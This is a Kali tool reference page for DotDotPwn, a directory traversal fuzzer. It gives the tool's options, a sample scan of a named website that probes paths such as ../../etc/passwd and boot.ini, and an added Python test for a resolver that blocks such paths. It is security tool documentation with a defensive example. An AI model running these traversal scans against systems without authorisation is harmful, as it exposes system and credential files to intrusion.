---
工具名稱: DotDotPwn
所屬分類: Information Gathering
標簽: [kali linux,dotdotpwn,information gathering,recon,http,exploitation tools]
創建時間: 2016-10-22 14:00:00
---
0x00 DotDotPwn Introduction
-------------
DotDotPwn is a very flexible, intelligent fuzzer for discovering directory traversal vulnerabilities in software such as HTTP/FTP/TFTP servers and web-platform applications (CMS, ERP, blogs, etc.).
It also has a protocol-independent module that sends a chosen payload to a specified host and port. In addition, it can be driven from scripts through the STDOUT module.
DotDotPwn is written in Perl and runs on *NIX or Windows; it was the first Mexican-developed tool included in BackTrack Linux (BT4 R2).
Fuzzing modules supported by this version:
```plain
HTTP
HTTP URL
FTP
TFTP
Payload (Protocol independent)
STDOUT
```
Source: https://github.com/wireghoul/dotdotpwn
[DotDotPwn homepage][1] | [Kali DotDotPwn repository][2]
- Authors: chr1x, nitr0us
- License: GPLv2
0x01 DotDotPwn Features
---------------
dotdotpwn.pl - DotDotPwn - Directory Traversal Fuzzer
```shell
root@kali:~# dotdotpwn
#################################################################################
#  CubilFelino Security Research Lab  and  Chatsubo [(in)Security Dark] Labs    #
#  chr1x.sectester.net                              chatsubo-labs.blogspot.com  #
#                               pr0udly present:                                #
#                              - DotDotPwn v3.0 -                               #
#                        The Directory Traversal Fuzzer                         #
#                        http://dotdotpwn.sectester.net                         #
#                            dotdotpwn@sectester.net                            #
#                              by chr1x & nitr0us                               #
#################################################################################
Usage: ./dotdotpwn.pl -m <module> -h <hostname> [options]
Available options:
 -m   Module [http | http-url | ftp | tftp | payload | stdout]
 -h   Hostname
 -O   Operating system detection for intelligent fuzzing (nmap module)
 -o   Operating system type if already known ("windows", "unix" or "generic")
 -s   Service version detection (banner grabbing)
 -d   Traversal depth (e.g. depth 3 is ../../../; default: 6)
 -f   Specific filename (e.g. /etc/motd; default: chosen according to the detected OS, configured in TraversalEngine.pm)
 -E   Add the @Extra_files from TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
 -S   Use SSL - for the HTTP and Payload modules (for http-url, use https:// in the URL instead)
 -u   URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
 -k   Text pattern to match in the response (http-url and payload modules; e.g. a string from /etc/passwd such as "root:")
 -p   Filename of the payload to send, with the part to be fuzzed marked by the TRAVERSAL keyword
 -x   Port to connect to (default: HTTP=80; FTP=21; TFTP=69)
 -t   Time to wait between tests (milliseconds; default: 300)
 -X   Once a vulnerability is found, use the bisection algorithm to detect the exact depth
 -e   File extension appended to the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
 -U   Username (default: 'anonymous')
 -P   Password (default: 'dot@dot.pwn')
 -M   HTTP method when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
 -r   Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
 -b   Break after the first vulnerability is found
 -q   Quiet mode (does not print each attempt)
 -C   Continue if no data is received from the host
```
<!--more-->
0x02 DotDotPwn Usage Example
-----------------
```shell
root@kali:~# dotdotpwn -m http -O -s -S -h www.hackfun.org
[+] Report name: Reports/www.hackfun.org_10-23-2016_23-42.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: www.hackfun.org
[+] Detecting Operating System (nmap) ...
[+] Operating System detected:
[+] Protocol: http
[+] Port: 443
[+] Service detected:
nginx
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 19680
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../windows/system32/drivers/etc/hosts
...
...
```
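The traversal engine output above multiplies dot/slash patterns by the `-d` depth and the per-OS filenames (19680 tests at depth 6). The Python below is an added example, not code from DotDotPwn or this page: it rebuilds a small version of that expansion and uses it as a regression test for a safe path resolver, the server-side check that makes every such request fail. The pattern list, filenames and base directory are constructed assumptions.

```python
import posixpath
from urllib.parse import unquote

# Constructed subset of the building blocks a traversal fuzzer combines:
# dot/slash mixes (plain, backslash, doubled, percent-encoded) ...
TRAVERSAL_PATTERNS = ["../", "..\\", "..//", "..%2f", "..%5c"]
# ... and the target filenames shown in the tool output above.
TARGET_FILES = {
    "unix": ["etc/passwd", "etc/issue"],
    "windows": ["boot.ini", "windows/system32/drivers/etc/hosts"],
}


def traversal_candidates(depth=6, os_type="generic"):
    """Expand pattern x depth x filename, mirroring the -d and -o switches."""
    if os_type == "generic":
        files = TARGET_FILES["unix"] + TARGET_FILES["windows"]
    else:
        files = TARGET_FILES[os_type]
    for pattern in TRAVERSAL_PATTERNS:
        for d in range(1, depth + 1):
            for name in files:
                yield pattern * d + name


def safe_resolve(base, user_path):
    """Return the resolved path under base, or None if it escapes base.

    Percent-decodes twice (catches double encoding), unifies backslashes
    and normalises before the prefix check, so encoded or mixed-separator
    traversal cannot slip past it.
    """
    decoded = unquote(unquote(user_path)).replace("\\", "/")
    full = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if full != base and not full.startswith(base.rstrip("/") + "/"):
        return None
    return full


def count_blocked(base="/var/www/html", depth=6):
    """(total candidates, how many safe_resolve rejected); both must match."""
    cands = list(traversal_candidates(depth))
    blocked = sum(1 for c in cands if safe_resolve(base, c) is None)
    return len(cands), blocked


if __name__ == "__main__":
    print("blocked %d of %d traversal candidates" % count_blocked()[::-1])
```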
[1]: http://dotdotpwn.blogspot.ca/
[2]: http://git.kali.org/gitweb/?p=packages/dotdotpwn.git;a=summary